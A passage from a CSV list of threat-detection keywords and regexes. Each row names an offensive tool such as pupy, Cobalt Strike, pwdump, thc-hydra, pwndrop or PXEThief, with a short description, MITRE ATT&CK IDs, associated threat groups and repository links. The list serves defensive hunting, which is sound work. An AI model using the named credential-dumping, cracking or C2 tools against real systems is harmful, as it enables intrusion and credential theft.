Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupySocketStream.py*",".{0,1000}PupySocketStream\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyVirtualStream.py*",".{0,1000}PupyVirtualStream\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*pureqh/bypassAV*",".{0,1000}pureqh\/bypassAV.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pureqh/bypassAV","1","1","N/A","10","10","444","100","2021-05-18T05:03:03Z","2021-02-25T05:26:11Z" "*purevpn_cred_collector.*",".{0,1000}purevpn_cred_collector\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*purplepanda.py*",".{0,1000}purplepanda\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*purplepanda_config.py*",".{0,1000}purplepanda_config\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*purplepanda_github.py*",".{0,1000}purplepanda_github\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*PURPLEPANDA_NEO4J_URL=*",".{0,1000}PURPLEPANDA_NEO4J_URL\=.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*purplepanda_prints.py*",".{0,1000}purplepanda_prints\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*PURPLEPANDA_PWD=*",".{0,1000}PURPLEPANDA_PWD\=.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*PurpleSharp.exe*",".{0,1000}PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*putterpanda_whoami*",".{0,1000}putterpanda_whoami.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*puttygen.exe FUZZ*",".{0,1000}puttygen\.exe\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*puzzlepeaches/NTLMRecon*",".{0,1000}puzzlepeaches\/NTLMRecon.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*PWCrack*",".{0,1000}PWCrack.{0,1000}","offensive_tool_keyword","PWCrack","cracking tool for multiple hash type","T1110 - T1111 - T1210 - 
T1558.002 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","5","486","60","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z" "*pwd*/*/rules/best64.rule*",".{0,1000}pwd.{0,1000}\/.{0,1000}\/rules\/best64\.rule.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*pwd_dump *",".{0,1000}pwd_dump\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*pwd|creds|cred|secret|userpw*",".{0,1000}pwd\|creds\|cred\|secret\|userpw.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass|pass*",".{0,1000}pwd\|passwd\|password\|PASSWD\|PASSWORD\|dbuser\|dbpass\|pass.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 
TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*PWDump*",".{0,1000}PWDump\..{0,1000}","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1110.001 - T1555.003","TA0006","N/A","N/A","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*PWDump.*",".{0,1000}PWDump\..{0,1000}","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1110.001 - T1555.003","TA0006","N/A","N/A","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*pwdump.exe*",".{0,1000}pwdump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*-PWDumpFormat*",".{0,1000}\-PWDumpFormat.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*pw-inspector -*",".{0,1000}pw\-inspector\s\-.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*pw-inspector.*",".{0,1000}pw\-inspector\..{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*pwn_jenkins*",".{0,1000}pwn_jenkins.{0,1000}","offensive_tool_keyword","pwn_jenkins","Remote Code Execution for jenkins","T1216 - T1210 - T1573","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gquere/pwn_jenkins","1","0","N/A","N/A","10","1894","320","2024-04-09T09:58:56Z","2018-07-18T14:24:27Z" "*pwn1sher/CS-BOFs*",".{0,1000}pwn1sher\/CS\-BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*pwn1sher/WMEye*",".{0,1000}pwn1sher\/WMEye.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation 
tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","331","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*pwn3d_label = Pwn3d!*",".{0,1000}pwn3d_label\s\=\sPwn3d!.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*pwnagotchi*",".{0,1000}pwnagotchi.{0,1000}","offensive_tool_keyword","pwnagotchi","Pwnagotchi is an A2C-based AI leveraging bettercap that learns from its surrounding WiFi environment to maximize the crackable WPA key material it captures (either passively. or by performing authentication and association attacks). This material is collected as PCAP files containing any form of handshake supported by hashcat. including PMKIDs. full and half WPA handshakes","T1562.004 - T1040 - T1557.001","TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/evilsocket/pwnagotchi","1","0","N/A","N/A","10","7206","1125","2024-04-01T22:20:48Z","2019-09-19T13:07:15Z" "*pwnat.exe*",".{0,1000}pwnat\.exe.{0,1000}","offensive_tool_keyword","pwnat","pwnat. by Samy Kamkar. is a tool that allows any client behind a NAT to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. Simply put. this is a proxy server that works behind a NAT. 
even when the client is also behind a NAT","T1584 - T1571 - T1210.001","TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/samyk/pwnat","1","0","N/A","N/A","10","3092","470","2023-12-29T19:40:28Z","2012-08-10T05:55:11Z" "*pwncat-cs *:*",".{0,1000}pwncat\-cs\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pwncat-cs -lp *",".{0,1000}pwncat\-cs\s\-lp\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pwncat-cs ssh://*",".{0,1000}pwncat\-cs\sssh\:\/\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pwndb --target @* --output *",".{0,1000}pwndb\s\-\-target\s\@.{0,1000}\s\-\-output\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PwnDexter/SharpEDRChecker*",".{0,1000}PwnDexter\/SharpEDRChecker.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*pwndrop install*",".{0,1000}pwndrop\sinstall.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop start*",".{0,1000}pwndrop\sstart.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop status*",".{0,1000}pwndrop\sstatus.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop stop*",".{0,1000}pwndrop\sstop.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and 
share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop-linux-amd64*",".{0,1000}pwndrop\-linux\-amd64.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwndrop-master*",".{0,1000}pwndrop\-master.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*pwned_x64/notepad.exe*",".{0,1000}pwned_x64\/notepad\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Pwned-creds_Domainpasswordspray.txt*",".{0,1000}Pwned\-creds_Domainpasswordspray\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*pwned-passwords-ntlm*",".{0,1000}pwned\-passwords\-ntlm.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is designed to downgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*pwnkit *",".{0,1000}pwnkit\s.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","96","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*pwnkit64decoded.c*",".{0,1000}pwnkit64decoded\.c.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","82","15","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" "*pwnsauc3/RWXFinder*",".{0,1000}pwnsauc3\/RWXFinder.{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","93","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" "*pwsafe2john.py*",".{0,1000}pwsafe2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*pxethief *",".{0,1000}pxethief\s.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","0","N/A","N/A","3","253","30","2024-01-29T18:10:17Z","2022-08-12T22:16:46Z" "*pxethief.py*",".{0,1000}pxethief\.py.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","253","30","2024-01-29T18:10:17Z","2022-08-12T22:16:46Z" "*pxlib\bin\kerberos.x64.o*",".{0,1000}pxlib\\bin\\kerberos\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*pycobalt.*",".{0,1000}pycobalt\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 